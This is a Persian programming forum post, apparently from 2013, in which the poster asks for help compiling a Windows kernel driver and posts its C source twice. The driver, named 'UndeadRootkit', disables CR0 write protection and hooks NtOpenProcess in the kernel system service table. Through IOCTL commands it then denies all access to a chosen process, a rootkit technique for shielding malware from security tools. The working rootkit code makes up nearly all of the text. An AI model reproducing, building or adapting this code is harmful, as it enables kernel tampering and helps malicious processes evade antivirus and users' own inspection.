بهروز عباسی
شنبه 26 اسفند 1391, 23:01 عصر
درود به همه:لبخند:
من باید یک درایور رو در VS 2010 کامپایل کنم ولی نمیدونم چطوری (قبلاً با 2008 مشکلی نبود از یک فایل bat استفاده می کردم الان اسمش یادم نیست:عصبانی:)
سایتو زیرو رو کردم به نتیجه ای نرسیدم بجز چندتای تاپیک که توی همشون Inprise (http://barnamenevis.org/member.php?1341-Inprise) به DDKWizard (http://ddkwizard.assarbad.net) اشاره کرده بود ،امّا متاصفانه ظاهراً DDKWizard (http://ddkwizard.assarbad.net) برای نسخه 2010 بروز رسانی نشده و البته نصب هم نشد
سورس رو میذارم اینجا لطفا راهنمایی کنید :
یا اگه کسی به WDK(DDK ) دسترسی داره لطفاً برام کامپایل کنه.:قلب:
#include "E:\WinDDK\7600.16385.1\inc\ddk\Ntddk.h"
#include "ntifs.h"
#define IO_HOOK_FUNCTIONS CTL_CODE(FILE_DEVICE_UNKNOWN, 0x0001, METHOD_BUFFERED, FILE_ANY_ACCESS)
#define IO_UNHOOK_FUNCTIONS CTL_CODE(FILE_DEVICE_UNKNOWN, 0x0002, METHOD_BUFFERED, FILE_ANY_ACCESS)
#define IO_GETSETINFO CTL_CODE(FILE_DEVICE_UNKNOWN, 0x0003, METHOD_BUFFERED, FILE_ANY_ACCESS)
//Global Variables
UNICODE_STRING DeviceName, DeviceLink;
HANDLE UserLandProcessID = (HANDLE)-1;
// Function callnumbers
ULONG NtOpenProcess_callnumber = 0x007a;
//Function Prototypes
NTKERNELAPI HANDLE PsGetProcessId(IN PEPROCESS Process);
NTSTATUS __stdcall IOControll(IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp);
void HookFunctions( void );
void UnHookFunctions( void );
HANDLE RetrivePID( char* );
// Function signatures
typedef ULONG (*NTOPENPROCESS)(OUT PHANDLE ProcessHandle, IN ACCESS_MASK DesiredAccess, IN POBJECT_ATTRIBUTES ObjectAttributes, IN PCLIENT_ID ClientId OPTIONAL);
// Function holders
NTOPENPROCESS OldNtOpenProcess;
void __declspec(naked) __stdcall UnProtect( void )
{
__asm
{
cli
mov eax, CR0
and eax, not 10000H
mov CR0, eax
}
}
void __declspec(naked) __stdcall Protect( void )
{
__asm
{
mov eax, CR0
OR eax, 10000h
mov CR0, eax
sti
}
}
NTSTATUS NewNtOpenProcess(OUT PHANDLE ProcessHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes,
IN PCLIENT_ID ClientId OPTIONAL)
{
NTSTATUS ntStatus = STATUS_INVALID_PARAMETER;
if ( ClientId->UniqueProcess == UserLandProcessID )
return STATUS_ACCESS_DENIED;
else
ntStatus = ((NTOPENPROCESS)(OldNtOpenProcess))(ProcessHandle, DesiredAccess, ObjectAttributes, ClientId);
return ntStatus;
}
void UnHookFunctions( void )
{
UnProtect();
//Restore origianl function address
(NTOPENPROCESS)KeServiceDescriptorTable->ServiceTable[NtOpenProcess_callnumber] = OldNtOpenProcess;
Protect();
}
void HookFunctions( void )
{
// Store original functions
OldNtOpenProcess = (NTOPENPROCESS)KeServiceDescriptorTable->ServiceTable[NtOpenProcess_callnumber];
UnProtect();
// Hook Functions
(NTOPENPROCESS)KeServiceDescriptorTable->ServiceTable[NtOpenProcess_callnumber] = &NewNtOpenProcess;
Protect();
}
HANDLE RetrivePID( char* ProcessName )
{
PEPROCESS PeProcess = NULL;
PLIST_ENTRY pNextEntry, pListHead;
PeProcess = PsGetCurrentProcess();
if(!PeProcess)
{
DbgPrint( "[ALARM] -> Cannot find 'System' process!" );
return (HANDLE)-1;
}
if( IsListEmpty( &PeProcess->ActiveProcessLinks ) )
DbgPrint("[ALARM] -> No processes found!");
else
{
pListHead = &PeProcess->ActiveProcessLinks;
pNextEntry = pListHead->Flink;
while(pNextEntry != pListHead)
{
PeProcess = CONTAINING_RECORD( pNextEntry,EPROCESS,ActiveProcessLinks );
if(PeProcess->ActiveThreads)
if( !IsListEmpty( &PeProcess->ThreadListHead ) )
if( _strnicmp( PeProcess->ImageFileName, ProcessName ,strlen(ProcessName) ) == 0 )
return PsGetProcessId( PeProcess );
PeProcess = NULL;
pNextEntry = pNextEntry->Flink;
}
}
return (HANDLE)-1;
}
NTSTATUS __stdcall IOControll(IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp)
{
NTSTATUS status = STATUS_SUCCESS;
int FunctionStatus = -1;
switch (Irp->Tail.Overlay.CurrentStackLocation->Parameters.DeviceIoControl.IoControlCode)
{
case IO_HOOK_FUNCTIONS:
FunctionStatus = 0;
Irp->IoStatus.Information = sizeof(int);
memcpy(Irp->AssociatedIrp.SystemBuffer, &FunctionStatus, sizeof(int));
DbgPrint("Hooking...\n");
HookFunctions();
break;
case IO_UNHOOK_FUNCTIONS:
FunctionStatus = 1;
Irp->IoStatus.Information = sizeof(int);
memcpy(Irp->AssociatedIrp.SystemBuffer, &FunctionStatus, sizeof(int));
DbgPrint("Unhooking...\n");
UnHookFunctions();
break;
case IO_GETSETINFO:
FunctionStatus = 2;
UserLandProcessID = RetrivePID( (char*)Irp->AssociatedIrp.SystemBuffer );
//DbgPrint("Process ID of %s %i", (char*)Irp->AssociatedIrp.SystemBuffer, UserLandProcessID);
DbgPrint("Process ID: %i", UserLandProcessID);
Irp->IoStatus.Information = sizeof(int);
memcpy(Irp->AssociatedIrp.SystemBuffer, &FunctionStatus, sizeof(int));
break;
}
IofCompleteRequest(Irp, IO_NO_INCREMENT);
return status;
}
NTSTATUS __stdcall IOOpenClose(IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp)
{
IofCompleteRequest(Irp, IO_NO_INCREMENT);
return STATUS_SUCCESS;
}
VOID OnUnload(IN PDRIVER_OBJECT DriverObject)
{
DbgPrint("Unloading!\n");
IoDeleteSymbolicLink(&DeviceLink);
IoDeleteDevice(DriverObject->DeviceObject);
DriverObject->DriverUnload;
}
//Driver entry point
NTSTATUS DriverEntry(IN PDRIVER_OBJECT DriverObject, IN PUNICODE_STRING theRegistryPath)
{
NTSTATUS ntStatus;
PDEVICE_OBJECT pDeviceObject;
RtlInitUnicodeString(&DeviceName, L"\\Device\\UndeadRootkit");
ntStatus = IoCreateDevice(DriverObject, 0, &DeviceName, FILE_DEVICE_UNKNOWN, 0, FALSE, &pDeviceObject);
if (ntStatus == STATUS_SUCCESS)
{
RtlInitUnicodeString(&DeviceLink, L"\\DosDevices\\UndeadRootkit");
if (IoCreateSymbolicLink(&DeviceLink, &DeviceName) != STATUS_SUCCESS)
{
IoDeleteDevice(DriverObject->DeviceObject);
return STATUS_OBJECT_NAME_EXISTS;
}
DriverObject->DriverUnload = OnUnload;
DriverObject->MajorFunction[IRP_MJ_CREATE] = &IOOpenClose;
DriverObject->MajorFunction[IRP_MJ_CLOSE] = &IOOpenClose;
DriverObject->MajorFunction[IRP_MJ_DEVICE_CONTROL] = &IOControll;
}
return ntStatus;
}
من باید یک درایور رو در VS 2010 کامپایل کنم ولی نمیدونم چطوری (قبلاً با 2008 مشکلی نبود از یک فایل bat استفاده می کردم الان اسمش یادم نیست:عصبانی:)
سایتو زیرو رو کردم به نتیجه ای نرسیدم بجز چندتای تاپیک که توی همشون Inprise (http://barnamenevis.org/member.php?1341-Inprise) به DDKWizard (http://ddkwizard.assarbad.net) اشاره کرده بود ،امّا متاصفانه ظاهراً DDKWizard (http://ddkwizard.assarbad.net) برای نسخه 2010 بروز رسانی نشده و البته نصب هم نشد
سورس رو میذارم اینجا لطفا راهنمایی کنید :
یا اگه کسی به WDK(DDK ) دسترسی داره لطفاً برام کامپایل کنه.:قلب:
#include "E:\WinDDK\7600.16385.1\inc\ddk\Ntddk.h"
#include "ntifs.h"
#define IO_HOOK_FUNCTIONS CTL_CODE(FILE_DEVICE_UNKNOWN, 0x0001, METHOD_BUFFERED, FILE_ANY_ACCESS)
#define IO_UNHOOK_FUNCTIONS CTL_CODE(FILE_DEVICE_UNKNOWN, 0x0002, METHOD_BUFFERED, FILE_ANY_ACCESS)
#define IO_GETSETINFO CTL_CODE(FILE_DEVICE_UNKNOWN, 0x0003, METHOD_BUFFERED, FILE_ANY_ACCESS)
//Global Variables
UNICODE_STRING DeviceName, DeviceLink;
HANDLE UserLandProcessID = (HANDLE)-1;
// Function callnumbers
ULONG NtOpenProcess_callnumber = 0x007a;
//Function Prototypes
NTKERNELAPI HANDLE PsGetProcessId(IN PEPROCESS Process);
NTSTATUS __stdcall IOControll(IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp);
void HookFunctions( void );
void UnHookFunctions( void );
HANDLE RetrivePID( char* );
// Function signatures
typedef ULONG (*NTOPENPROCESS)(OUT PHANDLE ProcessHandle, IN ACCESS_MASK DesiredAccess, IN POBJECT_ATTRIBUTES ObjectAttributes, IN PCLIENT_ID ClientId OPTIONAL);
// Function holders
NTOPENPROCESS OldNtOpenProcess;
void __declspec(naked) __stdcall UnProtect( void )
{
__asm
{
cli
mov eax, CR0
and eax, not 10000H
mov CR0, eax
}
}
void __declspec(naked) __stdcall Protect( void )
{
__asm
{
mov eax, CR0
OR eax, 10000h
mov CR0, eax
sti
}
}
NTSTATUS NewNtOpenProcess(OUT PHANDLE ProcessHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes,
IN PCLIENT_ID ClientId OPTIONAL)
{
NTSTATUS ntStatus = STATUS_INVALID_PARAMETER;
if ( ClientId->UniqueProcess == UserLandProcessID )
return STATUS_ACCESS_DENIED;
else
ntStatus = ((NTOPENPROCESS)(OldNtOpenProcess))(ProcessHandle, DesiredAccess, ObjectAttributes, ClientId);
return ntStatus;
}
void UnHookFunctions( void )
{
UnProtect();
//Restore origianl function address
(NTOPENPROCESS)KeServiceDescriptorTable->ServiceTable[NtOpenProcess_callnumber] = OldNtOpenProcess;
Protect();
}
void HookFunctions( void )
{
// Store original functions
OldNtOpenProcess = (NTOPENPROCESS)KeServiceDescriptorTable->ServiceTable[NtOpenProcess_callnumber];
UnProtect();
// Hook Functions
(NTOPENPROCESS)KeServiceDescriptorTable->ServiceTable[NtOpenProcess_callnumber] = &NewNtOpenProcess;
Protect();
}
HANDLE RetrivePID( char* ProcessName )
{
PEPROCESS PeProcess = NULL;
PLIST_ENTRY pNextEntry, pListHead;
PeProcess = PsGetCurrentProcess();
if(!PeProcess)
{
DbgPrint( "[ALARM] -> Cannot find 'System' process!" );
return (HANDLE)-1;
}
if( IsListEmpty( &PeProcess->ActiveProcessLinks ) )
DbgPrint("[ALARM] -> No processes found!");
else
{
pListHead = &PeProcess->ActiveProcessLinks;
pNextEntry = pListHead->Flink;
while(pNextEntry != pListHead)
{
PeProcess = CONTAINING_RECORD( pNextEntry,EPROCESS,ActiveProcessLinks );
if(PeProcess->ActiveThreads)
if( !IsListEmpty( &PeProcess->ThreadListHead ) )
if( _strnicmp( PeProcess->ImageFileName, ProcessName ,strlen(ProcessName) ) == 0 )
return PsGetProcessId( PeProcess );
PeProcess = NULL;
pNextEntry = pNextEntry->Flink;
}
}
return (HANDLE)-1;
}
NTSTATUS __stdcall IOControll(IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp)
{
NTSTATUS status = STATUS_SUCCESS;
int FunctionStatus = -1;
switch (Irp->Tail.Overlay.CurrentStackLocation->Parameters.DeviceIoControl.IoControlCode)
{
case IO_HOOK_FUNCTIONS:
FunctionStatus = 0;
Irp->IoStatus.Information = sizeof(int);
memcpy(Irp->AssociatedIrp.SystemBuffer, &FunctionStatus, sizeof(int));
DbgPrint("Hooking...\n");
HookFunctions();
break;
case IO_UNHOOK_FUNCTIONS:
FunctionStatus = 1;
Irp->IoStatus.Information = sizeof(int);
memcpy(Irp->AssociatedIrp.SystemBuffer, &FunctionStatus, sizeof(int));
DbgPrint("Unhooking...\n");
UnHookFunctions();
break;
case IO_GETSETINFO:
FunctionStatus = 2;
UserLandProcessID = RetrivePID( (char*)Irp->AssociatedIrp.SystemBuffer );
//DbgPrint("Process ID of %s %i", (char*)Irp->AssociatedIrp.SystemBuffer, UserLandProcessID);
DbgPrint("Process ID: %i", UserLandProcessID);
Irp->IoStatus.Information = sizeof(int);
memcpy(Irp->AssociatedIrp.SystemBuffer, &FunctionStatus, sizeof(int));
break;
}
IofCompleteRequest(Irp, IO_NO_INCREMENT);
return status;
}
NTSTATUS __stdcall IOOpenClose(IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp)
{
IofCompleteRequest(Irp, IO_NO_INCREMENT);
return STATUS_SUCCESS;
}
VOID OnUnload(IN PDRIVER_OBJECT DriverObject)
{
DbgPrint("Unloading!\n");
IoDeleteSymbolicLink(&DeviceLink);
IoDeleteDevice(DriverObject->DeviceObject);
DriverObject->DriverUnload;
}
//Driver entry point
NTSTATUS DriverEntry(IN PDRIVER_OBJECT DriverObject, IN PUNICODE_STRING theRegistryPath)
{
NTSTATUS ntStatus;
PDEVICE_OBJECT pDeviceObject;
RtlInitUnicodeString(&DeviceName, L"\\Device\\UndeadRootkit");
ntStatus = IoCreateDevice(DriverObject, 0, &DeviceName, FILE_DEVICE_UNKNOWN, 0, FALSE, &pDeviceObject);
if (ntStatus == STATUS_SUCCESS)
{
RtlInitUnicodeString(&DeviceLink, L"\\DosDevices\\UndeadRootkit");
if (IoCreateSymbolicLink(&DeviceLink, &DeviceName) != STATUS_SUCCESS)
{
IoDeleteDevice(DriverObject->DeviceObject);
return STATUS_OBJECT_NAME_EXISTS;
}
DriverObject->DriverUnload = OnUnload;
DriverObject->MajorFunction[IRP_MJ_CREATE] = &IOOpenClose;
DriverObject->MajorFunction[IRP_MJ_CLOSE] = &IOOpenClose;
DriverObject->MajorFunction[IRP_MJ_DEVICE_CONTROL] = &IOControll;
}
return ntStatus;
}